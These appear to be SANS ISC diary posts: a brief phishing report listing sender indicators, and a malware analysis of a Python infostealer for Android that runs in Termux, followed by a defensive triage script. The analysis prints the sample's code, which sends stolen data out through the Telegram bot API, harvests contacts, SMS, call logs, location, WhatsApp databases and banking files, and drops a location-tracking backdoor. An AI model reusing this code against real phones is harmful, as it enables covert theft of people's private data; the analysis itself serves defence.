Phishing Cloud Account for Information

    Published: 2025-10-23. Last Updated: 2025-10-24 00:39:18 UTC
    by Guy Bruneau (Version: 1)
    0 comment(s)

    Over the past two months, my Outlook account has been receiving phishing emails about cloud storage payments, mostly in French and some in English, with the usual warnings: the account is about to be locked, the storage is full, data will be lost, a payment was refused, the payment method has expired, etc.

    Some of the emails contain the typical minor spelling errors. The message is essentially the same every time, asking the recipient to log in before losing any data, and the landing page shows the same content in both languages.

    Reviewing the Storage Options page from the URL in the French and English emails shows the same message in both languages.

    This is a sample list of phishing emails received over the past 2 months, all with the same theme:

    Indicators

    Support du stockage cloud<indigo.thomas@gamepanditos[.]org>
    Cloud Billing Team<max.walker@gamepanditos[.]org>
    Dernier rappel<scout.jones@gulalguru[.]org>
    Support Technique Cloud<lane.lee@manyn[.]org>
    Support Technique Cloud<logan.king@crickstrike[.]org>
    ssistance Cloud Sécurisée<finley.ramirez@dudugo[.]space>
    Sécurité Cloud<indigo.anderson@badideaai[.]space>


    -----------
    Guy Bruneau IPSS Inc.
    My GitHub Page
    Twitter: GuyBruneau
    gbruneau at isc dot sans dot edu


    Infostealer Targeting Android Devices

    Published: 2025-10-23. Last Updated: 2025-10-23 12:09:38 UTC
    by Xavier Mertens (Version: 1)

    The infostealer landscape exploded in 2024, and infostealers remain a top threat today. While Windows remains the preferred target (read: attackers' favorite), I spotted an infostealer targeting Android devices. It is only logical that attackers pay attention to our beloved mobile devices, because our whole life is stored on them.

    The sample that I found (SHA256: 7576cdb835cd81ceb030f89fe5266649ed4a6201547c84da67144f407684a182) received a VT score of 0/64[1]! Undetected! The source code contains comments in Vietnamese. The sample is a Python script. How can you execute Python code on an Android device? Say hello to Termux, your new best friend.

    From the documentation: "Termux[2] is an Android terminal emulator and Linux environment app that works directly with no rooting or setup required. A minimal base system is installed automatically - additional packages are available using the APT package manager."

    Sounds great for running Python code.

    Once Termux is installed, add the Python package:

    $ pkg install python

    The infostealer is classic and exfiltrates data through a Telegram channel:

    import requests

    # BOT_TOKEN and CHAT_ID are presumably defined elsewhere in the sample (not reproduced here)
    def send_telegram(msg):
        try:
            url = f"https://api.telegram.org/bot{BOT_TOKEN}/sendMessage"
            data = {"chat_id": CHAT_ID, "text": msg}
            requests.post(url, data=data, timeout=10)
        except: pass  # any error is silently swallowed

    But how can the malware access Android data? Termux comes with a suite of command-line tools that provide juicy information. For example, termux-contact-list[3] returns the list of contacts stored on the phone in JSON:

    [
      {
        "id": 1,
        "name": "Alice Dupont",
        "phone_numbers": [
          "+32470123456",
          "+3221234567"
        ],
        "emails": [
          "alice.dupont@example.com"
        ]
      },
      {
        "id": 2,
        "name": "Bob Martin",
        "phone_numbers": [
          "+32475123456"
        ],
        "emails": []
      },
      {
        "id": 3,
        "name": "Caroline Smith",
        "phone_numbers": [],
        "emails": [
          "caroline.smith@company.com",
          "c.smith@gmail.com"
        ]
      }
    ]

    The infostealer will collect and exfiltrate the following information:

    import subprocess

    contacts = subprocess.getoutput('termux-contact-list')
    sms = subprocess.getoutput('termux-sms-list')
    call_log = subprocess.getoutput('termux-call-log')
    location = subprocess.getoutput('termux-location')

    The malware also tries to exfiltrate data from apps like Facebook and WhatsApp. How? In the Android ecosystem, Termux runs in a sandbox and only has access to its own $HOME directory:

    /data/data/com.termux/files/home

    But another tool is provided: termux-setup-storage. It grants access to the phone storage through a mapping like:

    /storage/emulated/0/<dir>

    Note that the victim will be prompted with a dialog asking for permission to access the storage. But they'll grant it, right?

    The malware will try to exfiltrate more data:

    fb_paths = [
        '/storage/emulated/0/Android/data/com.facebook.katana/',
        '/storage/emulated/0/Facebook/'
    ]
    wa_paths = [
        '/storage/emulated/0/WhatsApp/Databases/msgstore.db',
        '/storage/emulated/0/WhatsApp/Databases/wa.db',
        '/sdcard/WhatsApp/Databases/msgstore.db'
    ]
    media_paths = [
        '/storage/emulated/0/DCIM/',
        '/storage/emulated/0/Pictures/',
        '/storage/emulated/0/Movies/',
        '/storage/emulated/0/Download/'
    ]

    It will also search for banking related information:

    import os

    # Walk the whole shared storage and keep any file whose name hints at banking
    banking_files = []
    for root, dirs, files in os.walk('/storage/emulated/0/'):
        for file in files:
            if any(keyword in file.lower() for keyword in ['bank', 'atm', 'vietcombank', 'vpbank', 'mbbank', 'acb']):
                banking_files.append(os.path.join(root, file))

    Get device info:

    device_model = subprocess.getoutput('getprop ro.product.model')
    android_version = subprocess.getoutput('getprop ro.build.version.release')
    device_name = subprocess.getoutput('getprop ro.product.device')

    A backdoor will be installed:

    import os

    def install_backdoor():
        try:
            # Script dropped into the Termux home directory: it records the location every 5 minutes
            backdoor_script = '''
    import os, time, requests
    while True:
        try:
            os.system("termux-location > /data/data/com.termux/files/home/location.txt")
            time.sleep(300)
        except:
            time.sleep(60)
    '''
            with open('/data/data/com.termux/files/home/backdoor.py', 'w') as f:
                f.write(backdoor_script)
                os.system('python3 /data/data/com.termux/files/home/backdoor.py &')
        except: pass
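    As an added example (not code from the diary or from the sample), here is a small static-triage script that scans Python source for the Termux-specific traits described above: the Telegram bot exfiltration, the termux-* data collectors, shared-storage paths, getprop fingerprinting, the persistence script in the Termux home and the silent except. The rule names, the scoring thresholds and the two input snippets are constructed for this example.

```python
import re

# Constructed triage rules modelled on the traits described in the diary.
# Rule names, thresholds and the sample inputs are constructed for this example.
RULES = [
    ("telegram_bot_api", re.compile(r"api\.telegram\.org/bot")),
    ("termux_data_api", re.compile(r"termux-(contact-list|sms-list|call-log|location)\b")),
    ("storage_setup", re.compile(r"termux-setup-storage")),
    ("shared_storage_paths", re.compile(r"/storage/emulated/0/|/sdcard/")),
    ("whatsapp_db", re.compile(r"WhatsApp/Databases/(msgstore|wa)\.db")),
    ("storage_walk", re.compile(r"os\.walk\(\s*['\"]/storage/emulated/0")),
    ("banking_keywords", re.compile(r"['\"](vietcombank|vpbank|mbbank)['\"]")),
    ("device_fingerprint", re.compile(r"getprop ro\.(product|build)\.")),
    ("termux_home_persistence", re.compile(r"/data/data/com\.termux/files/home/\S+\.py")),
    ("silent_except", re.compile(r"except\s*:\s*pass")),
]

def triage(source: str) -> dict:
    """Return the matched rule names (in RULES order) and a verdict for one source text."""
    hits = [name for name, rx in RULES if rx.search(source)]
    # Telegram exfiltration combined with Termux data collection is the core
    # combination seen in the sample; three or more hits of any kind is still suspicious.
    core = "telegram_bot_api" in hits and "termux_data_api" in hits
    verdict = "malicious" if core else ("suspicious" if len(hits) >= 3 else "clean")
    return {"hits": hits, "verdict": verdict}

# Constructed inputs: a fragment shaped like the diary's sample, and a benign script.
SAMPLE = '''
import os, subprocess, requests
def send_telegram(msg):
    try:
        requests.post(f"https://api.telegram.org/bot{BOT_TOKEN}/sendMessage",
                      data={"chat_id": CHAT_ID, "text": msg}, timeout=10)
    except: pass
contacts = subprocess.getoutput('termux-contact-list')
device_model = subprocess.getoutput('getprop ro.product.model')
for root, dirs, files in os.walk('/storage/emulated/0/'):
    pass
'''
BENIGN = '''
import subprocess
print(subprocess.getoutput("getprop ro.product.model"))
'''

if __name__ == "__main__":
    for label, src in (("sample", SAMPLE), ("benign", BENIGN)):
        print(label, triage(src))
```

    The benign snippet shows why a single trait such as getprop is not enough on its own: the verdict only flips when the exfiltration channel and the Termux collectors appear together.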

    I just found the infostealer and I don’t know the complete infection path. How was Termux installed? Is it a PoC? But, for sure, Android devices can also be targeted!

    [1] https://www.virustotal.com/gui/file/7576cdb835cd81ceb030f89fe5266649ed4a6201547c84da67144f407684a182
    [2] https://termux.dev/en/
    [3] https://wiki.termux.com/wiki/Termux-contact-list

    Xavier Mertens (@xme)
    Xameco
    Senior ISC Handler - Freelance Cyber Security Consultant
    PGP Key

    ISC Stormcast For Thursday, October 23rd, 2025 https://isc.sans.edu/podcastdetail/9668
